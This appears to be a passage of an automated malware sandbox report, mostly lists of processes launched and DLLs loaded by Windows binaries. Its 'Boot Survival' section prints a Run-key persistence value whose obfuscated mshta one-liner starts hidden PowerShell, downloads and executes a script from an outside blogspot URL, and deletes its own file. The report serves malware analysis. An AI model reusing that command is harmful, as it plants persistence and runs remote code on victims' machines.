            Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe --user-data-dir="C:\Users\user\AppData\Local\Temp\chr5152.tmp" --explicitly-allowed-ports=8000 --disable-gpu --new-window "http://127.0.0.1:8000/1a18e89c/d8d6519b"
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2316,i,14866277002353003105,15716734756151876631,262144 --variations-seed-version --mojo-platform-channel-handle=2532 /prefetch:3
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
            Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
            Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2492 --field-trial-handle=1996,i,2173057654512074534,17827567997929056838,262144 /prefetch:3
            Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
            Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
            Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
            Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
            Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
            Source: C:\Windows\System32\svchost.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: qmgr.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: bitsperf.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: powrprof.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: xmllite.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: firewallapi.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: esent.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: umpdc.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: dnsapi.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: iphlpapi.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: fwbase.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: wldp.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: ntmarta.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: profapi.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: flightsettings.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: policymanager.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: msvcp110_win.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: netprofm.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: npmproxy.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: bitsigd.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: upnp.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: winhttp.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: ssdpapi.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: urlmon.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: iertutil.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: srvcli.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: netutils.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: appxdeploymentclient.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: cryptbase.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: wsmauto.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: miutils.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: wsmsvc.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: dsrole.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: pcwum.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: mi.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: userenv.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: gpapi.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: winhttp.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: wkscli.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: netutils.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: sspicli.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: msv1_0.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: ntlmshared.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: cryptdll.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: webio.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: mswsock.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: winnsi.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: rasadhlp.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: fwpuclnt.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: rmclient.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: usermgrcli.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: execmodelclient.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: propsys.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: coremessaging.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: twinapi.appcore.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: onecorecommonproxystub.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: execmodelproxy.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: resourcepolicyclient.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: vssapi.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: vsstrace.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: samcli.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: samlib.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: es.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: bitsproxy.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: dhcpcsvc6.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: dhcpcsvc.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: schannel.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: mskeyprotect.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: ntasn1.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: ncrypt.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: ncryptsslp.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: msasn1.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: cryptsp.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: rsaenh.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: dpapi.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: mpr.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: version.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: uxtheme.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: sxs.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: jscript.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: iertutil.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: amsi.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: userenv.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: profapi.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: wldp.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: msasn1.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: cryptsp.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: rsaenh.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: cryptbase.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: msisip.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: wshext.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: scrobj.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: gpapi.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: propsys.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: windows.storage.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: edputil.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: urlmon.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: srvcli.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: netutils.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: windows.staterepositoryps.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: sspicli.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: wintypes.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: appresolver.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: bcp47langs.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: slc.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: sppc.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: onecorecommonproxystub.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: onecoreuapcommonproxystub.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: pcacli.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: mpr.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: sfc_os.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: scrrun.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc6.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winnsi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasapi32.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasman.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rtutils.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winhttp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasadhlp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: fwpuclnt.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: schannel.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mskeyprotect.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntasn1.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncrypt.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncryptsslp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kdscli.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
            Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe | Section loaded: mscoree.dll
            Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe | Section loaded: version.dll
            Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe | Section loaded: windows.storage.dll
            Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe | Section loaded: wldp.dll
            Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe | Section loaded: profapi.dll
            Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe | Section loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\dllhost.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\dllhost.exe | Section loaded: wbemcomn.dll
            Source: C:\Windows\SysWOW64\dllhost.exe | Section loaded: amsi.dll
            Source: C:\Windows\SysWOW64\dllhost.exe | Section loaded: userenv.dll
            Source: C:\Windows\SysWOW64\dllhost.exe | Section loaded: profapi.dll
            Source: C:\Windows\SysWOW64\dllhost.exe | Section loaded: version.dll
            Source: C:\Windows\SysWOW64\dllhost.exe | Section loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\dllhost.exe | Section loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\dllhost.exe | Section loaded: wldp.dll
            Source: C:\Windows\SysWOW64\dllhost.exe | Section loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\dllhost.exe | Section loaded: mpr.dll
            Source: C:\Windows\SysWOW64\dllhost.exe | Section loaded: powrprof.dll
            Source: C:\Windows\SysWOW64\dllhost.exe | Section loaded: umpdc.dll
            Source: C:\Windows\SysWOW64\dllhost.exe | Section loaded: devobj.dll
            Source: C:\Windows\SysWOW64\dllhost.exe | Section loaded: msasn1.dll
            Source: C:\Windows\SysWOW64\dllhost.exe | Section loaded: wbemcomn.dll
            Source: C:\Windows\SysWOW64\dllhost.exe | Section loaded: wbemcomn.dll
            Source: C:\Windows\SysWOW64\dllhost.exe | Section loaded: wbemcomn.dll
            Source: C:\Windows\SysWOW64\dllhost.exe | Section loaded: drprov.dll
            Source: C:\Windows\SysWOW64\dllhost.exe | Section loaded: winsta.dll
            Source: C:\Windows\SysWOW64\dllhost.exe | Section loaded: ntlanman.dll
            Source: C:\Windows\SysWOW64\dllhost.exe | Section loaded: davclnt.dll
            Source: C:\Windows\SysWOW64\dllhost.exe | Section loaded: davhlpr.dll
            Source: C:\Windows\SysWOW64\dllhost.exe | Section loaded: wbemcomn.dll
            Source: C:\Windows\SysWOW64\dllhost.exe | Section loaded: wbemcomn.dll
            Source: C:\Windows\SysWOW64\dllhost.exe | Section loaded: wbemcomn.dll
            Source: C:\Windows\SysWOW64\dllhost.exe | Section loaded: wbemcomn.dll
            Source: C:\Windows\SysWOW64\dllhost.exe | Section loaded: wbemcomn.dll
            Source: C:\Windows\SysWOW64\dllhost.exe | Section loaded: wbemcomn.dll
            Source: C:\Windows\SysWOW64\dllhost.exe | Section loaded: wbemcomn.dll
            Source: C:\Windows\SysWOW64\dllhost.exe | Section loaded: wbemcomn.dll
            Source: C:\Windows\SysWOW64\dllhost.exe | Section loaded: mswsock.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: cryptbase.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: netapi32.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: netutils.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: iphlpapi.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: mswsock.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: dnsapi.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: rasadhlp.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: fwpuclnt.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: dpapi.dll
            Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe | Section loaded: dbghelp.dll
            Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe | Section loaded: kernel.appcore.dll
            Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe | Section loaded: sxs.dll
            Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe | Section loaded: dpapi.dll
            Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe | Section loaded: cryptbase.dll
            Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe | Section loaded: dbghelp.dll
            Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe | Section loaded: kernel.appcore.dll
            Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe | Section loaded: dbghelp.dll
            Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe | Section loaded: kernel.appcore.dll
            Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe | Section loaded: dbghelp.dll
            Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\System32\notepad.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\System32\notepad.exe | Section loaded: uxtheme.dll
            Source: C:\Windows\System32\notepad.exe | Section loaded: mrmcorer.dll
            Source: C:\Windows\System32\notepad.exe | Section loaded: windows.storage.dll
            Source: C:\Windows\System32\notepad.exe | Section loaded: wldp.dll
            Source: C:\Windows\System32\notepad.exe | Section loaded: textshaping.dll
            Source: C:\Windows\System32\notepad.exe | Section loaded: efswrt.dll
            Source: C:\Windows\System32\notepad.exe | Section loaded: mpr.dll
            Source: C:\Windows\System32\notepad.exe | Section loaded: wintypes.dll
            Source: C:\Windows\System32\notepad.exe | Section loaded: twinapi.appcore.dll
            Source: C:\Windows\System32\notepad.exe | Section loaded: oleacc.dll
            Source: C:\Windows\System32\notepad.exe | Section loaded: textinputframework.dll
            Source: C:\Windows\System32\notepad.exe | Section loaded: coreuicomponents.dll
            Source: C:\Windows\System32\notepad.exe | Section loaded: coremessaging.dll
            Source: C:\Windows\System32\notepad.exe | Section loaded: ntmarta.dll
            Source: C:\Windows\System32\notepad.exe | Section loaded: propsys.dll
            Source: C:\Windows\System32\notepad.exe | Section loaded: policymanager.dll
            Source: C:\Windows\System32\notepad.exe | Section loaded: msvcp110_win.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: uxtheme.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: wkscli.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: cscapi.dll
            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9672_none_d08f9da24428a513\MSVCR80.dll

            Boot Survival

            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run zevUsecure104
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run zevUsecure104 mshta "javascript:var mww = ['Shell.Application', 'SHELLEXECUTE', 'powershell', '-ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm https://mrachnew12.blogspot.com/lilw.doc) | . iex;Start-Sleep -Seconds 7;', '', 'open', 0], rfc = ['Scripting.FileSystemObject', 'DeleteFile', 'WScript.ScriptFullName'], rjz = new ActiveXObject(mww[0]); rjz[mww[1]](mww[2], mww[3], mww[4], mww[5], mww[6]);close(); new ActiveXObject(rfc[0])[rfc[1]](WScript[rfc[2]]);"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run drakezevo125
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run zevUsecure104
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run zevUsecure104
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run zevUsecure104
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run drakezevo125
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run drakezevo125

            Hooking and other Techniques for Hiding and Protection

            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
            Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
